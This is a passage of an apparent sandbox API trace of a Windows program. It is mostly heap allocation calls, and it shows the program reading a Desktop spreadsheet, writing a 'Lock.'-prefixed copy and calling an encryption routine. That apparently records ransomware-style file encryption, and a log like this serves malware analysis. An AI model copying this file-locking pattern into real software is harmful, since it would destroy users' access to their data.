Size=0x10) returned 0x2e50c08 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0216.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0216.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0216.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0216.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0216.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0216.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0216.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0216.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0216.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0216.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0216.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0216.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/_BsqZItCPNq0eBuQ.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\_bsqzitcpnq0ebuq.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0216.377] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.377] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0216.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0216.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0216.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0216.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0216.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0216.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0216.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.378] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0216.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0216.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock._BsqZItCPNq0eBuQ.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\lock._bsqzitcpnq0ebuq.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0216.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0216.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0216.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.426] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0216.426] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x80a1, lpOverlapped=0x0) returned 1 [0216.515] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0216.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a1) returned 0x2f24018 [0216.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0216.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0216.520] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0216.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a1) returned 0x2f24018 [0216.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0216.521] HeapFree (in: hHeap=0x970000, 